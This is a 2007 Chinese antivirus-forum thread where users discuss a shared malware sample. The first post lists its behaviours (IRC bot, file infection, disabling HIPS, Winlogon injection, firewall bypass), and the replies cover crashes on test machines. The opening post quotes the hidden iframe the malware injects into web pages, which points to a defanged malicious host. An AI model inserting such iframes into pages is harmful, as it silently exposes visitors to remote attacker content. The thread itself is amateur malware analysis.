12   1  /  2  页   跳转

【讨论】交流(有样本)

收藏
孤独更可靠
头像
锋芒艾服狮
  • 帖子:1788
  • 注册: 2007-01-27
  • 来自:
发表于: 2007-10-09 15:06 | 只看楼主 短消息 资料
字号: 1楼

【讨论】交流(有样本)

早上跟了会,原理还是不大懂,特此上传

病毒特征(包括但不限于):

1、IRCbot

2、感染文件(判断系统文件感染,系统盘一样遭殃,捆绑,感染标记PADDINGXXPADDING……)

3、Hook(不记得哪几个了)

4、破坏HIPS驱动(EQ、SSM均失效),原理不懂,还是恢复了SSDT挂钩?

5、往Winlogon写入代码,并直接获取系统内存。

6、添加到系统防火墙的忽略列表(穿墙)。

7、查找硬盘网页,插入JS代码:

<iframe src="hXXp://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>
</BODY>
</HTML>


其他的没跟踪到```

等待高手详细分析,诚心求教!

[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)

附件附件:

下载次数:101
文件类型:application/octet-stream
文件大小:
上传时间:2007-10-9 15:06:25
描述:

最后编辑2007-10-17 23:20:33.717000000
分享到:
gototop
 
日不懂啊
头像
叱咤花甲狮
  • 帖子:14337
  • 注册: 2007-03-08
  • 来自:江苏南京
发表于: 2007-10-09 15:13 | 短消息 资料
字号: 2楼

静等学习
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2007-10-09 15:31 | 短消息 资料
字号: 3楼

【回复“孤独更可靠”的帖子】
运行此样本后立即直接蓝屏重启。貌似跟我的系统有冲突。
汗!
gototop
 
孤独更可靠
头像
锋芒艾服狮
  • 帖子:1788
  • 注册: 2007-01-27
  • 来自:
发表于: 2007-10-09 15:36 | 只看楼主 短消息 资料
字号: 4楼

引用:
【baohe的贴子】【回复“孤独更可靠”的帖子】
运行此样本后立即直接蓝屏重启。貌似跟我的系统有冲突。
汗!
………………


老大,可能是Winlogon这个进程,防护先撤了哈

还有,是感染文件的,别实机了!
gototop
 
日不懂啊
头像
叱咤花甲狮
  • 帖子:14337
  • 注册: 2007-03-08
  • 来自:江苏南京
发表于: 2007-10-09 15:41 | 短消息 资料
字号: 5楼

呵呵,不敢玩这种感染型的,哈哈~~
机器烂,没办法搞虚拟机

高手们,加油啊~~
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2007-10-09 15:43 | 短消息 资料
字号: 6楼

我丢楼了?汗!
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2007-10-09 15:44 | 短消息 资料
字号: 7楼

蓝屏重启后,系统无异常。
gototop
 
日不懂啊
头像
叱咤花甲狮
  • 帖子:14337
  • 注册: 2007-03-08
  • 来自:江苏南京
发表于: 2007-10-09 15:49 | 短消息 资料
字号: 8楼

孤独大大是2000的系统吧?
跟猫叔的可能不一样吧?
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2007-10-09 15:55 | 短消息 资料
字号: 9楼

引用:
【孤独更可靠的贴子】

老大,可能是Winlogon这个进程,防护先撤了哈

还有,是感染文件的,别实机了!




………………

感染也无所谓了。新电脑有R&R。系统再生就是10来分钟的事情(前天刚刚试过,比GHOST强)。

附件附件:

下载次数:300
文件类型:image/pjpeg
文件大小:
上传时间:2007-10-9 15:55:06
描述:
预览信息:EXIF信息
gototop
 
孤独更可靠
头像
锋芒艾服狮
  • 帖子:1788
  • 注册: 2007-01-27
  • 来自:
发表于: 2007-10-09 16:27 | 只看楼主 短消息 资料
字号: 10楼

是啊,2千的系统

猫叔的XP

不过跟平台应该没有关系
gototop
 
<<上一主题|下一主题>>
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT